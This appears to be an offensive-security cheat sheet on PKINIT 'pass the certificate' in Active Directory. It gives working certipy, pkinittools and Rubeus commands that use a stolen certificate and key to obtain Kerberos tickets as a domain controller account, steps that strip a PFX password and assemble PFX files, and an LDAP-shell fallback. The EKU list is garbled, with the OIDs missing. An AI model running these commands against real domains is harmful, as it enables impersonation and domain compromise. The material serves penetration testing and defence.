05.06.2024 ยท dadevel

PKINIT or Public Key Cryptography for Initial Authentication is a Kerberos extension for asymmetric, certificated-based pre-authentication. If you have a users private key and certificate you can obtain a Kerberos TGT for that user.


  • The certificate SAN must contain the UPN of a user or the FQDN of a computer.
  • The ExtendedKeyUsage (EKU) extension must contain one of the following Object Identifiers (OIDs) (source):
    • Client Authentication (
    • PKINIT Client Authentication (
    • Smartcard Logon (
    • Any Purpose (
    • SubCA (no EKU present)
  • The certificate of the issuing CA must be part of the NTAuth container.


Pass the Certificate

certipy auth -no-hash -pfx ./dc01.pfx
export KRB5CCNAME=$PWD/dc01.ccache
pkinittools-gettgtpkinit -cert-pfx ./dc01.pfx '$' ./dc01.ccache
export KRB5CCNAME=$PWD/dc01.ccache
.\rubeus.exe asktgt /nowrap /user:dc01$ /certificate:%base64_pfx%


If certipy fails try pkinittools instead. If the authentication fails with KDC_ERROR_CLIENT_NOT_TRUSTED try a different DC (source). If authentication keeps failing maybe Strong Certificate Mapping is enforced and the user SID must be added to the certificate. See Lord of the SID: How to add the objectSID attribute to a certificate manually for details.

Remove password from PFX file.

certipy cert -pfx ./admin.pfx -password 'passw0rd' -export -out ./admin-unprotected.pfx

Combine private key and certificate into a PFX file.

echo $cert | base64 -d > ./cert.pem
echo $key | base64 -d >> ./cert.pem
openssl pkcs12 -in ./cert.pem -keyex -CSP 'Microsoft Enhanced Cryptographic Provider v1.0' -export -out ./cert.pfx

LDAP SChannel

If PKINIT is not configured you can still get a LDAP shell.

certipy auth -ldap-shell -pfx ./dc01.pfx

Untested tools: